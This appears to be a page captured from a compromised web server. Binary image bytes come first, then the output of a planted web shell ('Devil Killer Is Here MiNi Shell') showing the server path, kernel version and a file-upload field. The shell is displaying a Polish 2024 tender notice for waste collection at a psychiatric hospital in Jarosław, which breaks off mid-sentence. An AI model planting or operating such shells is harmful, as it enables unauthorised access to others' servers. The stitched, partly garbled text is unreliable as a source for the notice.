JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20241127/

Linux 9dbcd5f6333d 5.15.0-153-generic #163-Ubuntu SMP Thu Aug 7 16:37:18 UTC 2025 x86_64
Upload File :
Current File : //home/vmanager/www/common/web/tenders/20241127/0061858301-N-2024.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Usługi<br/> Odbiór, transport i zagospodarowanie odpadów komunalnych zmieszanych i odpadów selektywnych w roku 2025 </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">SPECJALISTYCZNY PSYCHIATRYCZNY ZESPÓŁ OPIEKI ZDROWOTNEJ IM.PROF.ANTONIEGO KĘPIŃSKIEGO W JAROSŁAWIU</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 000296638</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">ul. Tadeusza Kościuszki 18</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Jarosław</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">37-500</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">podkarpackie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL822 - Przemyski</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">16 621 46 11</span></h3> <h3 class="mb-0">1.5.8.) Numer faksu: <span class="normal">16 621 24 45</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">sekretariat@spzozjaroslaw.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">https://spzozjaroslaw.pl/</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - inna państwowa jednostka organizacyjna nieposiadająca osobowości prawnej</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Zdrowie</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Odbiór, transport i zagospodarowanie odpadów komunalnych zmieszanych i odpadów selektywnych w roku 2025 </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-7dadbf2c-4069-412c-8a9e-1fb222b519fd</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2024/BZP 00618583</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2024-11-27</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2024/BZP 00025966/20/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.3.1 Odbiór, transport i zagospodarowanie odpadów komunalnych zmieszanych i odpadów selektywnych w roku 2025</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://portal.smartpzp.pl/pcmrzeszow <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">1.	Komunikacja między zamawiającym, a wykonawcami, w tym wszelkie oświadczenia, wnioski, zawiadomienia oraz informacje, odbywa się: za pośrednictwem Platformy SmartPZP (zwanej dalej: Platformą/Systemem) pod adresem: https://portal.smartpzp.pl/pcmrzeszow</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">Ofertę, wniosek o dopuszczenie do udziału w postępowaniu, oświadczenie, o którym mowa <br/>w art. 125 ust. 1 ustawy Pzp, składa się pod rygorem nieważności w formie elektronicznej lub <br/>w postaci elektronicznej opatrzonej podpisem zaufanym lub podpisem osobistym, za pośrednictwem bezpłatnej Platformy Zakupowej pod adresem https://portal.smartpzp.pl/pcmrzeszow. <br/>Komunikacja między Zamawiającym, a Wykonawcami, w tym wszelkie oświadczenia, wnioski, zawiadomienia oraz informacje, przekazywane są w formie elektronicznej lub w postaci elektronicznej opatrzonej podpisem zaufanym lub podpisem osobistym za pośrednictwem Platformy, w zakładce „Korespondencja”. Za datę wpływu oświadczeń, wniosków, zaświadczeń oraz informacji przyjmuje się datę zapisania na serwerach. Aktualny data i godzina, zsynchronizowane z Głównym Urzędem Miar, wyświetlane są w prawym górnym rogu Platformy.<br/>Zalecenia: <br/>1)	Zamawiający rekomenduje wykorzystanie formatów: .pdf .doc .xls .jpg (.jpeg) <br/>ze szczególnym wskazaniem na .pdf.<br/>2)	W celu ewentualnej kompresji danych Zamawiający rekomenduje wykorzystanie jednego <br/>z formatów: − .zip − .7Z <br/>3)	Wśród formatów powszechnych a NIE występujących w rozporządzeniu występują: .rar .gif .bmp .numbers .pages. <br/>4)	Zamawiający zwraca uwagę na ograniczenia wielkości plików podpisywanych profilem zaufanym, który wynosi max 10MB, oraz na ograniczenie wielkości plików podpisywanych <br/>w aplikacji eDoApp służącej do składania podpisu osobistego, który wynosi max 5MB. <br/>5)	Ze względu na niskie ryzyko naruszenia integralności pliku oraz łatwiejszą weryfikację podpisu, Zamawiający zaleca, w miarę możliwości, przekonwertowanie plików składających się na ofertę na format .pdf i opatrzenie ich podpisem kwalifikowanym PAdES. <br/>6)	Pliki w innych formatach niż PDF zaleca się opatrzyć zewnętrznym podpisem XAdES. Wykonawca powinien pamiętać, aby plik z podpisem przekazywać łącznie <br/>z dokumentem podpisywanym. <br/>7)	Zamawiający zaleca aby w przypadku podpisywania pliku przez kilka osób, stosować podpisy tego samego rodzaju. Podpisywanie różnymi rodzajami podpisów np. osobistym <br/>i kwalifikowanym może doprowadzić do problemów w weryfikacji plików.<br/>8)	Zamawiający zaleca, aby Wykonawca z odpowiednim wyprzedzeniem przetestował możliwość prawidłowego wykorzystania wybranej metody podpisania plików oferty. <br/>9)	Osobą składającą ofertę powinna być osobą kontaktowa podawaną w dokumentacji.<br/>10)	Jeśli Wykonawca pakuje dokumenty, np.: w plik ZIP zalecamy wcześniejsze podpisanie każdego ze skompresowanych plików. <br/>11)	Zamawiający rekomenduje wykorzystanie podpisu z kwalifikowanym znacznikiem czasu. <br/>12)	Zamawiający zaleca, aby nie wprowadzać jakichkolwiek zmian w plikach <br/>po podpisaniu ich podpisem kwalifikowanym. Może to skutkować naruszeniem integralności plików co równoważne będzie z koniecznością odrzucenia oferty w postępowaniu. <br/>13)	Zamawiający zaleca ponumerowanie stron oferty. <br/>Zamawiający podaje wymagania techniczne związane z korzystaniem z Platformy: <br/>a)	Stały dostęp do sieci Internet o gwarantowanej przepustowości, nie mniejszej niż 1<br/>Mb/s<br/>b)	Komputer klasy PC lub MAC, o następującej konfiguracji: pamięć min. 3 GB RAM,<br/>procesor 1500 MHz lub lepszy, jeden z systemów operacyjnych Linux Kernel 4.0,<br/>Windows 7 i MacOS 10.12 - Lub ich nowsze wersje<br/>c)	Przeglądarki internetowe<br/>- Mozzilla Firefox ver. 65 i późniejsze, Google Chrome ver. 66 i późniejsze lub<br/>Opera ver. 58 i późniejsze, Microsoft Edge ver 18 i późniejsze, Internet Explorer 11<br/>- Lista zalecanych przeglądarek internetowych: Google Chrome, Mozilla Firefox,<br/>Opera.<br/>Zalecane jest używanie najnowszych wersji przeglądarek<br/>d)	Dodatkowe oprogramowanie<br/>- zainstalowane środowisko Java w wersji min. 1.8 (jre)<br/>- w przypadku przeglądarek Opera, Chrome i Firefox należy doinstalować<br/>dodatek do przeglądarki Szafir SDK Web<br/>- oprogramowania SzafirHost w systemie operacyjnym.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Zgodnie z art. 13 ust. 1 i 2 rozporządzenia Parlamentu Europejskiego i Rady (UE) 2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w związku z przetwarzaniem danych osobowych i w sprawie swobodnego przepływu takich danych oraz uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o ochronie danych) (Dz. Urz. UE L 119 z 04.05.2016, str. 1), dalej „RODO”, informuję, że: <br/>•	administratorem Pani/Pana danych osobowych jest Specjalistyczny Psychiatryczny Zespół Opieki Zdrowotnej im. prof. Antoniego Kępińskiego w Jarosławiu 37-500 ul. Kościuszki nr 18<br/>•	kontakt z inspektorem ochrony danych osobowych w SP ZOZ Jarosławiu: telefon: 16 6240656; e e-mail: daniel.panek@mpls.com.pl ; iod@spzozjaroslaw,pl<br/>•	Pani/Pana dane osobowe przetwarzane będą na podstawie art. 6 ust. 1 lit. c RODO w celu związanym z postępowaniem o udzielenie zamówienia publicznego „Odbiór, transport <br/>i zagospodarowanie odpadów komunalnych zmieszanych i odpadów selektywnych w roku 2025”.<br/>•	odbiorcami Pani/Pana danych osobowych będą osoby lub podmioty, którym udostępniona zostanie dokumentacja postępowania w oparciu o art. 18 oraz art. 74 Ustawa z dnia 11 września 2019 r.. – Prawo zamówień publicznych (Dz. U. z 2019, poz. 2019), dalej „ustawa Pzp”; <br/>•	Pani/Pana dane osobowe będą przechowywane, zgodnie z art. 78 ust. 1 ustawy Pzp, przez okres 4 lat od dnia zakończenia postępowania o udzielenie zamówienia, a jeżeli czas trwania umowy przekracza 4 lata, okres przechowywania obejmuje cały czas trwania umowy;<br/>•	obowiązek podania przez Panią/Pana danych osobowych bezpośrednio Pani/Pana dotyczących jest wymogiem ustawowym określonym w przepisach ustawy Pzp, związanym z udziałem w postępowaniu o udzielenie zamówienia publicznego; konsekwencje niepodania określonych danych wynikają z ustawy Pzp; <br/>•	w odniesieniu do Pani/Pana danych osobowych decyzje nie będą podejmowane <br/>w sposób zautomatyzowany, stosowanie do art. 22 RODO;<br/>posiada Pani/Pan:<br/>•	na podstawie art. 15 RODO prawo dostępu do danych osobowych Pani/Pana dotyczących;<br/>•	na podstawie art. 16 RODO prawo do sprostowania Pani/Pana danych osobowych **;<br/>•	na podstawie art. 18 RODO prawo żądania od administratora ograniczenia przetwarzania danych osobowych z zastrzeżeniem przypadków, o których mowa w art. 18 ust. 2 RODO ***; <br/>prawo do wniesienia skargi do Prezesa Urzędu Ochrony Danych Osobowych, gdy uzna Pani/Pan, że przetwarzanie danych osobowych Pani/Pana dotyczących narusza przepisy RODO;<br/>nie przysługuje Pani/Panu:<br/>w związku z art. 17 ust. 3 lit. b, d lub e RODO prawo do usunięcia danych osobowych;<br/>prawo do przenoszenia danych osobowych, o którym mowa w art. 20 RODO;<br/>na podstawie art. 21 RODO prawo sprzeciwu, wobec przetwarzania danych osobowych, gdyż podstawą prawną przetwarzania Pani/Pana danych osobowych jest art. 6 ust. 1 lit. c RODO. <br/>* Wyjaśnienie: informacja w tym zakresie jest wymagana, jeżeli w odniesieniu do danego administratora lub podmiotu przetwarzającego istnieje obowiązek wyznaczenia inspektora ochrony danych osobowych.<br/>** Wyjaśnienie: skorzystanie z prawa do sprostowania nie może skutkować zmianą wyniku postępowania udzielenie zamówienia publicznego ani zmianą postanowień umowy w zakresie niezgodnym z ustawą Pzp oraz nie może naruszać integralności protokołu oraz jego załączników.<br/>*** Wyjaśnienie: prawo do ograniczenia przetwarzania nie ma zastosowania w odniesieniu do przechowywania, w celu zapewnienia korzystania ze środków ochrony prawnej lub w celu ochrony praw innej osoby fizycznej lub prawnej, lub z uwagi na ważne względy interesu publicznego Unii Europejskiej lub państwa członkowskiego.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">ZP-3502/91/2024</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Usługi</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 1.	Przedmiotem niniejszego zamówienia jest Odbiór, transport i zagospodarowanie odpadów komunalnych zmieszanych i odpadów selektywnych bezpośrednio z nieruchomości Zamawiającego Specjalistycznego Psychiatrycznego Zespołu Opieki Zdrowotnej im. prof. Antoniego Kępińskiego ul Kościuszki 18, 37-500 Jarosław.<br/>2.	Zakres przedmiotowej usługi obejmuje: odbiór, transport i zagospodarowanie całego strumienia odpadów komunalnych zmieszanych i odpadów selektywnych na terenie Specjalistycznego Psychiatrycznego Zespołu Opieki Zdrowotnej<br/>3.	Zamawiający nie dopuszcza możliwości odbierania odpadów komunalnych zleconych przez Zamawiającego wspólnie z odpadami z gminy na terenie której znajduje się siedziba Zamawiaj lub z jakimikolwiek innymi odpadami.<br/>4.	Szczegółowy opis przedmiotu zamówienia znajduje się w załączniku nr 1 do SWZ.<br/>5.	Przedmiot zamówienia określony został we Wspólnym Słowniku Zamówień kodem: kod CPV 90500000-2- usługi gospodarki odpadami, 90511000-2- usługi wywozu odpadów, 90512000-9- usługi transportu odpadów, 90533000-2- usługi gospodarki odpadami<br/>6.	Zamawiający nie dopuszcza składania ofert częściowych.<br/>7.	Zamawiający nie dokonuje podziału zamówienia na części i tym samym nie dopuszcza składania ofert częściowych. Oferty nie zawierające pełnego zakresu przedmiotu zamówienia zostaną odrzucone<br/>8.	Powody niedokonania podziału zamówienia na części: Podział zamówienia nie został dokonany z uwagi na to, iż dzieląc przedmiotowe zamówienie na części zamawiający poniósłby nadmierne koszty wykonania zamówienia<br/>9.	Zamawiający nie dopuszcza składania ofert wariantowych. <br/>10.	Zamawiający nie przewiduje możliwości udzielenia zamówienia o którym mowa <br/>w art. 214 ust. 1 pkt. 7 i 8 ustawy Pzp. <br/>11.	Wymagania w zakresie zatrudnienia na podstawie stosunku pracy w okolicznościach, <br/>o których mowa w art. 95 ust. 1 i 2 Ustawy:<br/>1)	Zamawiający wymaga zatrudnienia przez Wykonawcę lub Podwykonawcę na podstawie stosunku pracy osób wykonujących następujące czynności w zakresie realizacji zamówienia:<br/>a) czynności związanych z odbiorem odpadów od Zamawiającego. <br/> b) porządkowaniem i załadunkiem odpadów <br/>c) kierowaniem pojazdami typu śmieciarka <br/>2)	w trakcie realizacji zamówienia Zamawiający uprawniony jest do wykonywania czynności kontrolnych wobec Wykonawcy odnośnie do spełniania przez Wykonawcę lub Podwykonawcę wymogu zatrudnienia na podstawie stosunku pracy osób wykonujących czynności wskazane w pkt 1. W celu weryfikacji spełniania tych wymagań Zamawiający uprawniony jest w szczególności do żądania:<br/>a)	oświadczenia zatrudnionego pracownika,<br/>b)	oświadczenia wykonawcy lub podwykonawcy o zatrudnieniu pracownika na podstawie umowy o pracę,<br/>c)	poświadczonej za zgodność z oryginałem kopii umowy o pracę zatrudnionego pracownika, <br/>d)	innych dokumentów <br/>e)	w przypadku wątpliwości Zamawiającego Wykonawca na każdorazowe wezwanie w wyznaczonym terminie przedłoży Zamawiającemu poświadczoną za zgodność z oryginałem ( odpowiednio przez Wykonawcę lub Podwykonawcę) kopię umów o pracę zawierające informacje, w tym dane osobowe, niezbędne do weryfikacji zatrudnienia na podstawie umowy o pracę, w szczególności imię i nazwisko zatrudnionego pracownika, datę zawarcia umowy o pracę, rodzaj umowy o pracę i zakres obowiązków pracownika; (Ochrona danych osobowych osób fizycznych będzie dokonywana na podstawie rozporządzenia Parlamentu Europejskiego i Rady (UE) 2016/679 z dnia 27 kwietnia 2016r. w sprawie ochrony osób fizycznych w związku z przetwarzaniem danych osobowych i w sprawie swobodnego przepływu takich danych oraz uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o ochronie danych) (Dz. Urz. UE L119 z 04.05.2016r., poz. 1).<br/>3)	Wykonawca na każde wezwanie Zamawiającego w wyznaczonym w tym wezwaniu terminie przedłoży Zamawiającemu wskazane w pkt. 2 dowody w celu potwierdzenia spełnienia wymogu zatrudnienia na podstawie stosunku pracy przez Wykonawcę lub Podwykonawcę osób wykonujących czynności wymienione w pkt 1. Sankcje z tytułu niespełnienia tych wymagań Zamawiający określa w SWZ.<br/>4)	w przypadku uzasadnionych wątpliwości, co do przestrzegania prawa pracy przez Wykonawcę lub Podwykonawcę, Zamawiający może zwrócić się o przeprowadzenie kontroli przez Państwową Inspekcję Pracy.<br/>12.	Zamawiający dopuszcza powierzenie zamówienia podwykonawcom Wykonawcy. <br/>W takim wypadku Wykonawca ma obowiązek (zgodnie z art. 462 ust. 2 ustawy Pzp) wskazania części zamówienia, których wykonanie zamierza powierzyć podwykonawcom oraz podania nazw ewentualnych podwykonawców, o ile są znani.<br/>13.	Zamawiający wymaga, aby w przypadku powierzenia części zamówienia podwykonawcom, Wykonawca wskazał w ofercie części zamówienia, których wykonanie zamierza powierzyć podwykonawcom oraz podał (o ile są mu wiadome na tym etapie) nazwy (firmy) tych podwykonawców.<br/>14.	Jeżeli zmiana albo rezygnacja z podwykonawcy dotyczy podmiotu, na którego zasoby wykonawca powoływał się, na zasadach określonych w art. 118 ust. 1 Ustawy Pzp, w celu wykazania spełniania warunków udziału w postępowaniu, wykonawca jest obowiązany wykazać zamawiającemu, że proponowany inny podwykonawca lub wykonawca samodzielnie spełnia je w stopniu nie mniejszym niż podwykonawca, na którego zasoby wykonawca powoływał się w trakcie postępowania o udzielenie zamówienia.<br/>15.	umowa o podwykonawstwo nie może zawierać postanowień kształtujących prawa <br/>i obowiązki podwykonawcy w zakresie kar umownych oraz postanowień dotyczących warunków wypłaty wynagrodzenia w sposób dla niego mniej korzystny niż prawa i obowiązki wykonawcy, ukształtowane postanowieniami umowy zawartej między zamawiającym, <br/>a wykonawcą. <br/>16.	Ilekroć w dalszych postanowieniach Specyfikacji Warunków Zamówienia, mowa jest <br/>o przedmiocie zamówienia bez bliższego oznaczenia, należy przez to rozumieć przedmiot zamówienia opisany niniejszym rozdziale, oraz w Załącznikach do SWZ.<br/>Nazwa	Rodzaj pojemnika	Szacunkowa ilość w okresie trwania umowy<br/>Odbiór odpadów komunalnych zmieszanych - kod 20 03 01.<br/>-odpadów selektywnych ( opakowania z papieru i tektury ) kod 15 01 01 ,20 01 01<br/>Opakowania z tworzyw sztucznych kod 15 01 02 , 15 01 06<br/><br/>Opakowania szklane – kod 15 01 07 odbiór odpadów w miarę potrzeb	Prasokontener hakowy <br/>poj. 10 m 3<br/>wymiary: 4410x2200x2500 mm<br/>Prasokontener jest własnością szpital<br/><br/><br/>Dzierżawa kontenera o poj.1100l. szt. 2 (kod 15 01 07)<br/>	115,0 ton<br/>Odbiór odpadów zielonych ulegających biodegradacji ( liście trawa) kod 20 02 01	Dzierżawa kontenera KP7 , kontener odkryty<br/>( podstawienie kontenera i odbiór na zgłoszenie)	38 ton<br/>Odbiór odpadów ulegających biodegradacji ( kuchenne suche)<br/> kod 20 01 08 , odbiór 1 x w tygodniu lub wg. potrzeb	Dzierżawa kontenera o poj. 1100 l 1 szt.	52 x odbiór w trakcie trwania umowy<br/>Odbiór odpadów wielkogabarytowych kod 20 03 07	Kontener Kp - 25	10 ton </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">90500000-2 - Usługi związane z odpadami</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">90512000-9 - Usługi transportu odpadów</p> <p class="mb-0">90533000-2 - Usługi gospodarki odpadami</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja w dniach --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">12 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">1. Zamawiający wybiera ofertę najkorzystniejszą na podstawie kryteriów oceny ofert określonych w pkt 2.<br/>2. Przy wyborze najkorzystniejszej oferty Zamawiający będzie kierował się następującym kryterium:<br/>Cena brutto 100% <br/>Punkty za kryterium dla n – tego Wykonawcy będą obliczane wg wzoru: <br/>dla kryterium – cena brutto <br/>C min <br/>P cn = ……………………………….. x 100 pkt<br/> C n <br/><br/>gdzie: 1% = 1 pkt <br/>( P c n ) – ilość punktów za cenę dla ocenianego Wykonawcy; <br/>( C min ) – najniższa cena spośród ocenianych ofert; <br/>( C n ) – cena zawarta w badanej ofercie;<br/><br/>a)	Oferta najkorzystniejsza to oferta z najwyższą ocena na podstawie sumy otrzymanych punktów w kryteriach: cena.<br/>b)	Wszystkie obliczenia będą dokonywane z dokładnością do dwóch miejsc po przecinku zgodnie <br/>z zasadami arytmetyki.<br/>c)	Jeżeli zostaną złożone oferty o takiej samej cenie, Zamawiający wezwie Wykonawców , którzy złożyli te oferty , do złożenia w terminie określonym przez Zamawiającego ofert dodatkowych. Wykonawcy składając oferty dodatkowe , nie mogą zaoferować cen wyższych niż zaoferowali w pierwotnie złożonych ofertach. <br/>d)	W toku badania i oceny ofert Zamawiający może żądać od Wykonawcy 